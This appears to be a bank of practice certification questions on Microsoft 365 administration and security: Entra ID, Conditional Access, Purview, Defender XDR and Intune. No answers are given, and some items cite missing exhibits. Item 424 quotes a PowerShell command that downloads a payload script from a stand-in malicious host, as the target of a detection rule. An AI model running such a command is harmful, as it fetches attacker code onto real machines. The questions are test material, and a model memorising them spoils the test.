Medium338Refer to the exhibit. You run the PowerShell command shown. The output shows no results. The user confirms they downloaded files from SharePoint last week. What is the most likely cause?
Medium339Your organization uses Microsoft Purview Records Management and has a file plan that categorizes records by department. You need to ensure that HR records are retained for seven years after employee termination, while finance records are retained for ten years after the end of the fiscal year. What is the most efficient way to implement this?
Medium340Your organization needs to ensure that all emails containing credit card numbers are automatically encrypted before being sent to external recipients. Which Microsoft Purview solution should you configure?
Easy341A company must ensure that all outgoing emails containing credit card numbers are blocked from being sent to external recipients. When a user attempts to send such an email, it should be blocked immediately, and the user should see a policy tip explaining the rule. Which Microsoft Purview solution should the administrator configure?
Medium342Your organization, Contoso, has a Microsoft Entra ID tenant with 50,000 users. You are implementing a zero-trust security model. The following requirements must be met: 1) All access to SaaS applications must be restricted based on user, device, and location. 2) Users accessing from unmanaged devices must only be allowed browser-based access and must accept terms of use. 3) The IT team must be able to grant temporary access to the Global Administrator role for up to 8 hours. 4) All external users must have their access reviewed every 6 months. Which combination of Microsoft Entra features should you use?
Medium343A company wants to require that all users accessing a critical cloud application for the first time must accept a company terms of use before they are granted access. Which Conditional Access policy grant control should be added?
Medium344Your organization is planning to deploy Microsoft 365 Copilot. You need to ensure that all prerequisites are met. Which of the following is a mandatory prerequisite for enabling Microsoft 365 Copilot?
Easy345A security analyst is investigating a suspected credential theft attack where an attacker attempts to dump credentials from LSASS. Which Attack Surface Reduction (ASR) rule should the administrator enable to block this activity from untrusted processes?
Hard346An admin needs to bulk assign licenses to 200 users based on department. Which method is most efficient?
Medium347A security administrator is configuring Microsoft Defender for Office 365 to protect against zero-day malware in attachments. The administrator wants to use dynamic delivery so that users can view the email body while the attachment is being analyzed. However, the administrator is concerned about false positives and wants to ensure that if a benign attachment is later found to be malicious, it is removed from the user's inbox. What should the administrator configure?
Hard348A compliance officer needs to prevent users from sharing confidential documents with external users outside the organization. The policy should block sharing via email attachments or sharing links from SharePoint Online. Which Microsoft Purview solution should be configured?
Medium349A company uses Microsoft Entra ID P2 licenses. They want to block all authentication attempts from an internal app that uses legacy authentication protocols (POP3, IMAP, SMTP) because these protocols cannot enforce multi-factor authentication. Which Conditional Access policy setting should be used?
Medium350Your organization wants to use Microsoft Intune to manage devices. You need to ensure that only corporate-owned devices can enroll. What configuration should you use?
Easy351You are a security administrator. You need to investigate a suspicious logon from an anonymous IP address. Which Microsoft Defender XDR data source should you query first?
Easy352Contoso frequently collaborates with a partner company (Fabrikam) via B2B collaboration. Contoso uses Microsoft Entra ID P2 licenses and wants to require Fabrikam's guest users to authenticate using Contoso's MFA policies, ignoring any MFA claims from the Fabrikam home tenant. Fabrikam already has MFA enabled for its users. What configuration should Contoso make in their cross-tenant access settings?
Medium353Your organization needs to automatically detect and classify documents containing passport numbers in SharePoint Online. Which Microsoft Purview feature should you use?
Easy354You are the Microsoft 365 administrator for a company that has a Microsoft 365 E5 subscription. The company has a policy that all files stored in SharePoint Online and OneDrive for Business must be retained for seven years. You need to implement a retention solution that meets this requirement and ensures that users cannot permanently delete the files before the retention period expires. What should you do?
Medium355An administrator has added a custom domain 'contoso.com' to their Microsoft 365 tenant and verified ownership. However, users are unable to receive emails sent to their custom domain. Which type of DNS record must the administrator add in the public DNS zone to route emails to Exchange Online?
Easy356You need to configure Microsoft Purview Data Loss Prevention (DLP) to prevent sensitive data from being shared via email. Which THREE elements can you use to define the policy?
Medium357Your organization uses Microsoft Defender for Office 365. You need to configure a policy that automatically redirects emails containing malicious attachments to a quarantine folder for admin review. What type of policy should you create?
Medium358You are configuring Microsoft Entra ID for a new organization. The CIO wants to ensure that all external users who are invited to collaborate via Microsoft Entra B2B must go through an approval process before gaining access. Which setting should you configure?
Easy359Your company has a Microsoft Entra tenant with 5,000 users. You need to delegate the ability to reset user passwords to the helpdesk team, but only for users in the Sales department. What is the most efficient way to achieve this?
Medium360A company wants to receive alerts when a user account is used from an unauthorized location. They have Microsoft Defender for Cloud Apps (MDA). Which policy type should they create?
Easy361An organization has just purchased Microsoft 365 subscriptions and wants to add their custom domain 'fabrikam.com' to the tenant. Which record must they add to their DNS provider to verify domain ownership?
Easy362An administrator is onboarding a new custom domain for email in a Microsoft 365 tenant. Which step should be performed first?
Easy363Your organization uses Microsoft Entra ID with Privileged Identity Management (PIM) to manage administrative roles. You need to ensure that when a user activates the Global Administrator role, they must provide a justification and the activation is time-bound. Additionally, you want to require approval from the security team for this activation. What should you configure?
Hard364Your organization uses Microsoft Purview Compliance Manager. You need to assign a control to a specific user for implementation. What should you do?
Hard365An administrator adds the custom domain 'adatum.com' to a new Microsoft 365 tenant. In the Microsoft 365 admin center, the domain status shows 'Pending verification'. Which type of DNS record must the administrator add to the public DNS zone to complete the domain ownership verification?
Easy366You run the PowerShell command shown in the exhibit for a Microsoft 365 tenant. The output shows DisplayName as 'Contoso', DefaultDomainName as 'contoso.onmicrosoft.com', and InitialDomain as 'contoso.onmicrosoft.com'. What does this indicate about the tenant?
Easy367An organization is involved in litigation and needs to search for all communications containing a specific keyword across Exchange Online, SharePoint Online, and OneDrive for Business. The results must be preserved as evidence without allowing deletion. Which Microsoft Purview solution should the compliance officer use?
Medium368A security analyst wants to automatically create a Microsoft Teams message in a dedicated security channel whenever a Microsoft 365 Defender incident with severity 'High' is created. Which automation approach should the analyst use?
Hard369Your organization uses Microsoft Entra ID to manage user identities. You need to ensure that users can sign in using their existing social media accounts, such as Microsoft, Google, or Facebook. What should you configure?
Easy370Your organization uses Microsoft Defender for Identity (MDI) and Microsoft Defender for Cloud Apps. You receive an alert about a user account that is exhibiting suspicious behavior: unusual login times from an IP address that is not in the user's typical location. The alert recommends action. You need to determine if the account is compromised. What is the best next step?
Medium371Your organization has Microsoft 365 E5 and uses Microsoft Defender for Cloud Apps. You want to block downloads from an unsanctioned cloud app that is used by some employees. What should you configure?
Medium372An organization wants to enforce that all administrators use a phishing-resistant authentication method (e.g., FIDO2 security keys or Windows Hello for Business) when accessing Microsoft 365 admin portals. Which Microsoft Entra ID feature should be used?
Medium373A multinational company uses Microsoft Entra ID with Conditional Access policies. They have a policy that requires multi-factor authentication (MFA) for all users when accessing the company's custom SaaS application. However, users from the European branch are reporting that they are prompted for MFA every time, even though they have already authenticated via a compliant device. What is the most likely cause?
Hard374A company wants to require approval for any activation of the Global Administrator role in Privileged Identity Management (PIM). The approvers are predefined as members of a security group named 'GA-Approvers'. Activations must require a business justification and expire after 4 hours. Which PIM configuration should the administrator modify to meet these requirements?
Hard375A company has a hybrid identity setup. A new employee is created in on-premises AD but does not appear in Azure AD after sync. What should the admin check first?
Easy376An administrator needs to open a Microsoft 365 support request because a critical service issue is affecting all users. Which two pieces of information should the administrator have readily available before contacting support? (Choose two.)
Easy377Your organization uses Microsoft Entra ID and has enabled Microsoft Entra ID Protection. You notice that the number of 'Leaked Credentials' detections is high. What action should you take to automatically remediate this risk?
Medium378A compliance officer needs to automatically apply a sensitivity label to all documents in SharePoint Online that contain a credit card number. The label must mark the document as 'Confidential' and encrypt it. Which two Microsoft Purview components must be configured to achieve automatic labeling based on sensitive content? (Choose two.)
Hard379You are configuring Microsoft Entra ID provisioning for a SaaS application that supports SCIM 2.0. The app requires the 'manager' attribute to be mapped. However, the manager attribute is not populated for all users. What should you do to avoid provisioning failures?
Easy380A company uses Azure AD and SharePoint Online. They want to allow users from a partner organization (which also uses Azure AD) to access a specific SharePoint Online site using their existing partner credentials. The partner users should not require new accounts to be created. Which Azure AD feature should be configured?
Medium381Your organization is implementing a hybrid identity solution. You want to synchronize on-premises Active Directory users to Microsoft Entra ID. Which tool should you use?
Easy382A Microsoft 365 tenant uses a custom domain named fabrikam.com for all user principal names and email addresses. The security team requires that any email message sent from an external sender that spoofs fabrikam.com be rejected outright, while legitimate messages from the on-premises mail relay must still be accepted. You configure DKIM signing and SPF with a hard fail. What should you configure next to meet the rejection requirement?
Hard383You run the KQL query shown in the exhibit in Microsoft Defender XDR advanced hunting. What is the primary purpose of this query?
Easy384An organization has just purchased Microsoft 365 Business Standard licenses and has added the custom domain 'contoso.com' to the tenant. The administrator wants all new user email addresses to use '@contoso.com' instead of the default '@contoso.onmicrosoft.com'. How can this be achieved?
Easy385A compliance officer needs to mark documents in a SharePoint Online library as regulatory records. These records must be immutable (cannot be modified or deleted) for 3 years. After 3 years, a disposition review must be initiated to decide if the records can be deleted. Which Microsoft Purview solution should the officer configure?
Easy386A company uses Azure AD Conditional Access. The security team wants to require multi-factor authentication (MFA) for all users when accessing the Azure portal, except when they are connecting from the corporate network (which is defined as a trusted location). How should the Conditional Access policy be configured?
Medium387You run the above PowerShell command on a Windows 10 device that is onboarded to Microsoft Defender for Endpoint. The device is reporting as healthy in the portal, but you suspect that some behavioral detection capabilities are turned off. Based on the output, which setting should you modify?
Medium388Which TWO Microsoft Entra ID features can be used to provide just-in-time (JIT) access to privileged roles?
Medium389A company uses Microsoft Defender for Cloud Apps to monitor cloud app usage. They want to receive alerts when a user downloads a large number of files from SharePoint Online in a short time, which could indicate data exfiltration. What should they configure?
Medium390A compliance administrator needs to automatically apply a retention label to all documents in a SharePoint Online site that contain Social Security numbers. The label should retain the documents for 5 years and then automatically delete them. Which feature should they configure?
Medium391Drag and drop the steps to configure a Conditional Access policy in Microsoft Entra ID in the correct order.
Medium392Your company uses Microsoft Defender XDR. You need to review the list of incidents that were investigated automatically by the system. Where should you navigate in the Microsoft Defender portal?
Easy393Which TWO actions can be performed by Microsoft Defender for Identity? (Select TWO.)
Medium394You are the Microsoft 365 administrator for a company that has a Microsoft 365 E5 tenant. The legal department requires that all email messages sent to and from the tenant be retained for seven years, and that users cannot permanently delete messages before that period ends. The solution must apply to all mailboxes, including new ones created later, and must not require users to apply retention labels manually. What should you do?
Easy395Your organization uses Microsoft Defender for Identity and has enabled Microsoft Secure Score. You notice that the Secure Score for Identity has dropped significantly after a recent configuration change. Which action is most likely to have caused the decrease?
Hard396Your company uses Microsoft Purview Data Loss Prevention (DLP) to protect sensitive data in Microsoft Teams. Users are sharing credit card numbers in Teams chat messages. You have a DLP policy that detects credit card numbers and blocks the message. However, users report that they can still send messages containing credit card numbers without any block. What is the most likely reason?
Hard397Your company is deploying Microsoft Defender for Office 365. The security team wants to automatically remove messages identified as malware from all mailboxes after delivery. What should you configure?
Hard398Your organization plans to allow external users to access a SharePoint Online site using their own Microsoft Entra ID credentials. You need to ensure that external users can authenticate without creating a guest account in your tenant. Which solution should you use?
Medium399Your company uses Microsoft 365 and has recently deployed Microsoft Intune for mobile device management. You need to ensure that corporate data on iOS devices is protected by preventing users from copying data from managed apps to unmanaged apps. What should you configure?
Medium400Your company uses Microsoft Purview Data Lifecycle Management. You have a policy that retains items for 3 years and then deletes them. A user places an eDiscovery hold on a folder that contains items subject to this policy. What happens to those items after 3 years?
Hard401Refer to the exhibit. You are reviewing a Microsoft Purview auto-labeling policy configuration. The SensitivityTypes GUID corresponds to a sensitive info type that detects credit card numbers. The LabelId is for a 'Confidential' label. Users report that documents containing credit card numbers are not being automatically labeled. What is the most likely reason?
Hard402Refer to the exhibit. You are reviewing a Microsoft Entra ID Governance access review. The JSON shows an access review scope for a SharePoint site. What does the 'isExternallyAccessible': false setting indicate about the site?
Medium403Refer to the exhibit. You are configuring permissions for a daemon application that runs without a user. Which permission should you request?
Easy404A compliance officer needs to prevent external users from printing or copying content from documents stored in a SharePoint Online site. Which Microsoft Purview feature should be configured to enforce this restriction?
Hard405Your organization has a hybrid identity environment with Microsoft Entra Connect. You are planning to migrate to cloud-only authentication using Microsoft Entra Cloud Sync. However, some legacy applications still require NTLM authentication. What should you do to ensure those applications can authenticate after the migration?
Hard406A company uses Microsoft Defender for Office 365. They want to ensure that users cannot ignore warning messages when clicking on a malicious link in an email. What should they configure?
Medium407You are implementing Microsoft Entra ID Governance. You need to automate the creation of guest user accounts when employees submit a request through the company's HR system. What should you use?
Easy408Your company uses Microsoft Entra ID and has a custom line-of-business application that supports SAML-based SSO. You need to configure the application to use Microsoft Entra ID as the identity provider. Which enterprise application configuration should you use?
Medium409A company has just purchased Microsoft 365 Business Standard and added the custom domain 'fabrikam.com' to the tenant. They want to verify domain ownership. Which DNS record type must they add to their DNS provider?
Easy410You are a Microsoft 365 administrator. You run the Get-MgPolicyCrossTenantAccessPolicyDefault cmdlet and see the exhibit output. What does this configuration imply?
Medium411A compliance officer needs to preserve all mailbox data for a user who is under a legal investigation. The data must be preserved indefinitely, and no deletion (by the user or system) should be possible. Which Microsoft Purview feature should the officer use?
Easy412Your organization uses Microsoft Defender for Identity. You need to investigate an alert indicating a suspected lateral movement using pass-the-hash from a compromised workstation. Which entity should you prioritize examining in the investigation timeline?
Hard413Refer to the exhibit. The Contoso tenant has a cross-tenant access policy configured for Fabrikam. Users from Fabrikam are unable to access resources in Contoso via B2B collaboration. What is the most likely reason?
Hard414A security analyst investigates a potential data exfiltration incident. The analyst identifies that a user's device has made multiple connections to an unknown external IP address using a custom port. Which Microsoft Defender XDR data source would provide the most detailed network communication logs for this investigation?
Medium415Your organization uses Microsoft Entra ID P2 licenses. You need to configure a Conditional Access policy that requires phishing-resistant authentication for all users when accessing the Azure Management application. Which TWO authentication methods satisfy the requirement?
Medium416An administrator needs to update the organization's display name, technical contact, and privacy statement URL in the Microsoft 365 admin center. Which page should they navigate to?
Easy417Your organization has a Microsoft 365 tenant with a custom domain contoso.com. You have configured Exchange Online to accept emails for contoso.com. You now need to add a subdomain sales.contoso.com and ensure that email sent to sales.contoso.com is delivered to a specific shared mailbox. What should you do?
Medium418Refer to the exhibit. You are configuring consent for the Microsoft Graph application. Which of the following statements is true based on the JSON?
Medium419A company has purchased Microsoft 365 Business Standard and added the custom domain 'fabrikam.com' to the tenant. The company wants all new users to have 'fabrikam.com' as their default email domain instead of the onmicrosoft.com domain. How should the administrator achieve this?
Easy420Refer to the exhibit. The conditional access policy JSON shown above is applied to all users. A user authenticates from a trusted location and wants to access a cloud app. Which combination of controls will be enforced?
Hard421A security administrator wants to detect unusual user activity, such as a user downloading an abnormally large number of files from SharePoint Online in a short period. Which Microsoft Defender for Cloud Apps feature should be used to create a policy for this behavior?
Easy422A company invites external partners as B2B guest users in Microsoft Entra ID. The partners' home tenants do not support MFA. The company wants to require MFA when guests access an internal application. What should the company configure?
Hard423You are a Microsoft 365 administrator for Litware Inc. The company uses Microsoft Purview Records Management. A file plan has been created with a retention label named 'Project Alpha'. You need to ensure that documents labeled 'Project Alpha' are retained for five years after the project ends, and then automatically deleted. What should you configure on the retention label?
Easy424You are a security administrator for Litware, Inc. The company uses Microsoft Defender XDR. You need to configure a custom detection rule that alerts when a user runs a specific PowerShell command on any device. The command is: `Invoke-WebRequest -Uri 'http://malicious.site/payload.ps1' -OutFile 'C:\temp\payload.ps1'`. Which advanced hunting table and column should you use to detect this activity?
Medium425Your organization plans to use Microsoft 365 Copilot. To ensure compliance, you need to prevent Copilot from accessing sensitive content in SharePoint Online document libraries that are labeled as 'Highly Confidential'. What should you configure?
Medium426Your organization uses Microsoft Entra ID and requires users to authenticate using FIDO2 security keys. You need to ensure that users can register and manage their security keys through the My Security Info portal. Which authentication method policy setting should you enable?
Medium427Your company has a Microsoft 365 E5 subscription and uses Microsoft Entra ID. Users report that they are frequently prompted for multi-factor authentication (MFA) even after signing in successfully. You want to minimize these prompts while maintaining security. What should you configure?
Medium428You are designing a Microsoft Entra ID tenant for a new subsidiary. You need to ensure that users can authenticate using their existing on-premises Active Directory credentials without synchronizing password hashes to the cloud. Which identity model should you choose?
Medium429Your organization uses Microsoft Entra ID to manage user identities. You need to ensure that users can reset their own passwords without administrator intervention, but only if they have registered for self-service password reset (SSPR). What should you configure?
Medium430An administrator has added the custom domain 'contoso.co.uk' to their Microsoft 365 tenant and verified ownership. Users now need to receive email at @contoso.co.uk. Which DNS record must the administrator add in the public DNS zone to route emails to Exchange Online?
Medium431You are a security administrator for an organization that uses Microsoft Defender XDR. You want to provide your security operations team with a unified view of all incidents across endpoints, email, and identities. You also want to automate the creation of incidents when correlated alerts are detected. What should you do?
Easy432Your company has a Microsoft 365 E5 subscription. You need to configure multi-factor authentication (MFA) for all users. However, the CEO insists that he should not be prompted for MFA when connecting from the corporate office. What should you do?
Easy433Your organization uses Microsoft Entra ID with Application Proxy to publish on-premises web apps. Users report that they are prompted for credentials multiple times when accessing an app. You need to reduce the number of authentication prompts. What should you configure?
Hard434Refer to the exhibit. You are reviewing a Conditional Access policy JSON. The policy is intended to block legacy authentication. However, users are still able to connect using Exchange ActiveSync. What is the most likely reason?
Hard435A security administrator wants to reduce the risk of credential dumping from LSASS on managed Windows endpoints. Which Attack Surface Reduction rule should be enabled?
Medium436Your company has a Microsoft 365 E3 tenant. You need to enable Microsoft Purview Data Loss Prevention (DLP) to prevent sensitive data from being shared externally via email. What must you do first?
Easy437Which THREE settings can you configure in a Microsoft Defender for Office 365 anti-phish policy?
Medium438Contoso uses Microsoft Entra ID P1 licenses and has a dedicated corporate office with static public IP addresses. The company wants to require MFA for all users, but exempt users when they connect from the corporate office. Which configuration should the administrator implement?
Medium439You are deploying a new Microsoft 365 tenant for a company that has a single domain, contoso.com. You need to verify domain ownership to enable email routing. Which DNS record type must you add to the public DNS zone?
Easy440A security administrator wants to ensure that all email attachments are scanned in a sandbox environment and blocked if malicious, with email delivery delayed until scanning completes. Which Microsoft 365 Defender policy should the administrator configure?
Easy441A company has 500 users across Sales, Marketing, and IT departments. User objects are synced from on-premises Active Directory to Microsoft Entra ID using Azure AD Connect. Each department requires different Microsoft 365 license plans (e.g., Sales needs E3, Marketing needs Business Premium, IT needs E5). The administrator wants to automatically assign the appropriate license based on the department attribute without manual intervention. Which approach should the administrator use?
Hard442Your organization uses Microsoft 365 Business Premium with Microsoft Entra ID P1. You have 200 users. You need to enforce multi-factor authentication (MFA) for all users accessing the company's CRM application, which is a third-party SaaS app integrated via SAML. The CRM app does not support modern authentication protocols. You want to use a Microsoft solution that does not require additional licenses. What should you use?
Easy443Your organization has a hybrid identity deployment using Microsoft Entra Connect Sync. You need to ensure that password writeback is enabled so that users can reset their own passwords from the cloud. Which prerequisite must be met?
Hard444A company wants to require that all users accessing a critical internal application must be on a compliant device (managed by Intune) and must have authenticated with multi-factor authentication in the last 30 minutes. Which Conditional Access configurations are needed?
Medium445You are a security administrator for a company that uses Microsoft Defender XDR. An analyst reports that a user's device is showing signs of compromise, and you need to isolate the device from the network while preserving the ability to collect forensic evidence. The device is running Windows 11 and is onboarded to Microsoft Defender for Endpoint. Which action should you take in the Microsoft 365 Defender portal?
Medium446Your organization has Microsoft Defender for Cloud Apps deployed. You need to be alerted when a user performs more than 50 failed login attempts in an hour from a non-corporate IP address. Which type of policy should you create?
Hard447A security analyst wants to create a custom detection rule that triggers when a user receives a phishing email that bypassed Exchange Online Protection, and then clicks a link that leads to a known malicious domain. Which two advanced hunting tables should the analyst combine to detect this chain of events?
Hard448You are a Microsoft 365 administrator for Tailspin Toys. You have Microsoft Defender XDR configured with Microsoft Defender for Office 365 and Microsoft Defender for Endpoint. You need to ensure that when a user clicks a malicious link in an email, the alert is enriched with the device information of the user's computer, and the device is automatically investigated. What should you do?
Hard449You are the identity administrator for a Microsoft 365 E5 tenant. The company uses Microsoft Entra ID P2. The security team wants to implement access reviews for privileged roles. They want to ensure that access reviews are conducted quarterly and that reviewers must provide a justification for their decision. You need to configure the access review. Which two actions should you perform? (Choose two.)
Hard450Your organization is deploying Windows 11 using Microsoft Intune. You need to ensure that devices are automatically enrolled in Intune when users sign in with their Microsoft Entra ID credentials. Which THREE prerequisites must be met?
Hard451Your organization is migrating from on-premises Active Directory to Microsoft Entra ID. You need to ensure that users can use their existing on-premises passwords to log in to cloud services, while maintaining password policy enforcement on-premises. Which feature should you implement?
Medium452Your organization uses Microsoft Defender for Cloud Apps. You discover that a user is accessing a sanctioned cloud app from an unknown IP address. You want to require multi-factor authentication (MFA) for this access. What should you configure?
Easy453A compliance officer needs to retain all documents in a SharePoint Online site for 7 years and then automatically delete them. During the retention period, users must be able to edit the documents but not delete them. Which Microsoft Purview solution should the officer configure?
Medium454Your organization has a Microsoft 365 E5 tenant. You need to ensure that users are prompted to register for multifactor authentication (MFA) the first time they sign in. Which Microsoft Entra ID policy should you configure?
Easy455You need to configure Microsoft Entra ID to allow users to authenticate using their existing social media accounts. Which identity provider type should you add?
Medium456A company needs to migrate several shared mailboxes from on-premises Exchange 2016 to Exchange Online. The company plans to keep some user mailboxes on-premises for now. Which migration strategy should they use for the shared mailboxes?
Medium457A security analyst needs to create a custom detection rule in Microsoft Defender XDR that triggers when a user's device establishes a network connection to a known malicious IP address on a port commonly used by a specific malware. The rule must also include process information such as the filename of the process that initiated the connection. Which advanced hunting table should be the primary data source for this rule?
Hard458You are configuring Microsoft Entra ID Protection. You want to automatically respond to a specific risk level by requiring the user to change their password. Which risk policy should you configure?
Easy459You are a security administrator for a company that uses Microsoft Defender XDR. You need to investigate a suspicious email that was reported by a user. You want to see the full email details, including headers, attachments, and URLs. Where should you look?
Easy460A company uses Azure AD Privileged Identity Management (PIM) to manage role activations. They have an Azure AD Premium P2 license. The security team wants to require that any activation of the Exchange Administrator role must be approved by a specific group named 'Exchange Approvers'. Additionally, activations must require a ticket number and expire after 6 hours. Which PIM configuration should the administrator modify?
Medium461You create a custom detection rule in Microsoft Defender XDR using the KQL query shown in the exhibit. The rule is intended to detect lateral movement via SMB. After deploying the rule, you notice that it generates many false positives from legitimate administrative activity. What is the most effective way to reduce false positives?
Hard462Your organization uses Microsoft Defender for Endpoint (MDE). A security analyst needs to investigate a file that was detected as malicious on several devices. The analyst wants to see the file's prevalence across the organization and other related events. Which feature in MDE should the analyst use?
Easy463Drag and drop the steps to configure Microsoft 365 Groups expiration policy in the correct order.
Medium464Your company uses Microsoft Entra ID with P2 licenses. You need to configure Privileged Identity Management (PIM) for Azure AD roles. Which THREE actions are possible with PIM?
Hard465Your organization uses Microsoft Defender for Endpoint (Plan 2) and Microsoft Defender for Identity. A security analyst reports that several domain controllers are generating alerts for anomalous logon activity. You need to investigate the scope of the potential compromise across the entire environment, including endpoints, identities, and cloud apps. What is the most efficient approach?
Hard466Your organization uses Microsoft Defender XDR and Microsoft 365 E5 licenses. You need to ensure that when a user is determined to be compromised (e.g., due to a leaked credential), all active sessions are terminated and the user is required to re-authenticate with multi-factor authentication (MFA). You want to automate this process as much as possible. What should you do?
Medium467A compliance officer needs to prevent users from copying sensitive data (e.g., credit card numbers) from a finance application into personal email or documents. The solution must inspect the content in real-time and block the action if sensitive data is detected. Which Microsoft Purview feature should the officer configure?
Medium468Your organization has 5,000 users and uses Microsoft 365 E3. You are planning to migrate from on-premises Exchange to Exchange Online. You have already synchronized identities using Microsoft Entra Connect. The CIO wants to ensure that users can continue to access their email if the internet connection to Microsoft 365 is temporarily lost. You need to recommend a solution that provides offline access while minimizing cost and administrative overhead. What should you recommend?
Medium469A compliance officer needs to automatically apply a retention label to all documents in SharePoint Online that contain the exact phrase 'Contract'. The label must retain the documents for 10 years. Which Microsoft Purview feature should the officer configure?
Easy470A security administrator wants to automatically isolate a device in Microsoft Defender for Endpoint whenever a high-severity alert is triggered. The isolation should occur without manual intervention. Which Microsoft Defender XDR feature should be configured?
Medium471Your organization uses Microsoft Entra ID. You want to enforce Multi-Factor Authentication (MFA) for all users. You have already configured Conditional Access policies. However, some users are still able to sign in without MFA. What should you check first?
Medium472You are a security administrator for a company that uses Microsoft Defender XDR. You need to ensure that when a user clicks a malicious link in an email, the URL is automatically blocked and the user is prevented from accessing the site. Which Microsoft Defender XDR component should you configure?
Medium473Which TWO of the following are valid methods to enforce device compliance in a Conditional Access policy? (Select two.)
Hard474Your organization uses Microsoft Defender for Office 365. You need to ensure that emails containing malicious attachments are automatically removed from users' inboxes after detection. What should you configure?
Easy475A company wants to block access to Exchange Online from devices that are not compliant with Intune compliance policies. Which Conditional Access grant control should be used?
Medium476A security analyst is using Microsoft 365 Defender Advanced Hunting to investigate a potential malware outbreak. The analyst needs to find all devices where a specific signed executable (known to be malicious) was created in the past 24 hours. Which Advanced Hunting table should be queried to detect the creation of the executable file?
Hard477An administrator wants to add a second custom domain, 'contoso-europe.com', to their existing Microsoft 365 tenant. The domain 'contoso.com' is already verified. What is the first step the administrator should take?
Easy478Refer to the exhibit. A Conditional Access policy is created in Microsoft Entra ID. The policy targets the Office 365 app (which includes Exchange Online). You have 1000 users assigned. What is the immediate effect of this policy on users who are currently signed in?
Hard479You are a security administrator. You need to ensure that email messages containing malicious attachments are automatically removed from all mailboxes in your organization after delivery. Which Microsoft Defender for Office 365 feature should you configure?
Easy480Refer to the exhibit. You are configuring a session policy in Microsoft Defender for Cloud Apps. The policy must block downloads when both the app risk is high and the user risk is high. Based on the exhibit, which additional condition should you add to ensure the policy only applies to unsanctioned apps?
Medium481Your company has a hybrid identity configuration with Microsoft Entra Connect Sync. You need to enable password hash synchronization (PHS) for hybrid users. What is the prerequisite?
Easy482An administrator wants to configure automated investigation and response (AIR) in Microsoft 365 Defender so that when a high-severity malware alert is generated for a device from Microsoft Defender for Endpoint, the device is automatically isolated from the network without requiring a security analyst to approve the action. Which configuration step is required?
Medium483Your company uses Microsoft Entra ID and has an app named App1 that requires permissions to read all user profiles. You need to grant admin consent for App1 to read profiles without requiring each user to consent. What should you do?
Medium484An administrator recently added a custom domain 'tailspintoys.com' to their Microsoft 365 tenant and verified it. They now need to configure the domain so that all recipient email addresses for 'info@tailspintoys.com' are delivered to a shared mailbox in Exchange Online. The domain is currently set as internal relay. What should the administrator do first to route email for this domain to Exchange Online?
Medium485Your organization uses Microsoft Defender for Office 365 and Microsoft Defender for Cloud Apps. A user reports receiving a suspicious email with a link to a known phishing site. You need to prevent other users from clicking similar links in the future. What should you configure?
Medium486A security administrator wants to automatically block a file that is detected as malware on one endpoint from being executed on all other endpoints in the organization. Which Microsoft Defender for Endpoint capability provides this?
Medium487Refer to the exhibit. You are creating a custom role in Microsoft Entra ID for helpdesk staff. What can users assigned this role do?
Medium488Your organization uses Microsoft 365 and has enabled Microsoft Entra ID P2 licenses. You need to configure automatic user provisioning for a third-party SaaS application that supports SCIM 2.0. What should you do first in the Microsoft Entra admin center?
Hard489A company uses hybrid identity with Azure AD Connect and password hash synchronization. They want to enable Self-Service Password Reset (SSPR) with password writeback so that users can reset their on-premises Active Directory passwords. Which Azure AD license is required?
Easy490Your organization is implementing Microsoft Purview Communication Compliance to detect potential insider trading. You need to scan internal emails for specific patterns and assign reviewers from the legal team. What is the minimum number of policies required?
Hard491An organization wants to allow users to sign in to Microsoft 365 using their on-premises Active Directory credentials but does not want to synchronize password hashes to the cloud. They also want to eliminate the need for users to re-enter their credentials when accessing cloud resources from domain-joined devices. Which combination of authentication methods should they implement?
Medium492Your organization is a small business with 200 users. You use Microsoft 365 Business Premium, which includes Microsoft Defender for Business (the small business version of Defender for Endpoint) and Microsoft Defender for Office 365 Plan 1. You want to protect against ransomware by blocking malicious processes and behaviors on endpoints. You also need to enable automated investigation and response for common threats. However, your IT team has limited security expertise and wants a simple configuration that provides out-of-the-box protection without custom policies. What should you do?
Easy493A security analyst wants to create a custom detection rule in Microsoft Defender XDR that triggers when a user receives a phishing email and clicks a link to a known malicious domain. Which advanced hunting table should the analyst query to track the clicked URL?
Medium494An organization wants to prevent users from running executable files from the Windows Temp folder. Which Microsoft Defender for Endpoint capability should be configured?
Easy495Your organization uses Microsoft Defender for Endpoint (Plan 2) and Microsoft Defender for Identity. A user reports that their device is running slowly and exhibiting unusual network traffic. You investigate in Microsoft Defender XDR and see a high number of alerts for the device. You need to determine if the device is compromised and, if so, initiate an automated investigation. What should you do first?
Hard496Refer to the exhibit. You run the KQL query and see that a device named 'WORKSTATION42' has made 1500 connections to a public IP address 203.0.113.55 in the last day. You suspect the device may be compromised. What should you do next to gain the most context?
Hard497Your organization uses Microsoft Defender for Cloud Apps. You need to generate alerts when a user downloads more than 100 files from SharePoint Online within 10 minutes. What should you configure?
Easy498A security administrator wants to block executable files from running from writable system directories such as %TEMP% and %APPDATA% on Windows devices. Which attack surface reduction (ASR) rule should be enabled?
Hard499A company is deploying Microsoft Defender for Office 365 to protect against advanced threats. Which two features are available only in Defender for Office 365 Plan 2 and not in Plan 1? (Choose two.)
Easy500Your company has a Microsoft 365 E5 subscription. You need to prevent users from sharing files containing credit card numbers with external users. What should you configure?
Medium501A security analyst needs to create a custom detection rule in Microsoft 365 Defender that triggers when a suspicious PowerShell process (e.g., using -EncodedCommand) is detected on a device, and within 5 minutes, an outbound network connection to a known malicious IP address occurs. Which two advanced hunting tables must be joined?
Hard502A company uses Azure AD Conditional Access to enforce MFA for all cloud apps. They have some users who are physically located in countries that are considered high-risk by the security team. The team wants to require device compliance (as defined by Intune) for sign-ins from those specific countries, while still requiring MFA from all other locations. How should the administrator configure the Conditional Access policy?
Medium503Refer to the exhibit. You are analyzing a KQL query in Microsoft Defender XDR Advanced Hunting. The query returns a list of devices where PowerShell or cmd.exe with encoded commands executed more than 5 times in the last 7 days. The security team suspects that one of the devices is compromised due to excessive use of encoded commands. However, a legitimate administrative script uses encoded commands regularly. How can you refine the query to reduce false positives while still detecting potentially malicious activity?
Hard504Your organization uses Microsoft Defender for Cloud Apps. You need to generate a report of all external users who have shared sensitive files from SharePoint Online. Which feature should you use?
Easy505You are implementing Microsoft Entra Verified ID. Which technology does it use to create decentralized digital identities?
Easy506You are investigating an incident in Microsoft Defender XDR. The incident involves multiple alerts from different sources. Which THREE actions should you take during the investigation?
Hard507A security administrator wants to monitor and control user downloads from a third-party SaaS application (e.g., Box) in real time. The administrator needs to apply session-level policies to block downloads based on risk. Which Microsoft 365 Defender feature should be used?
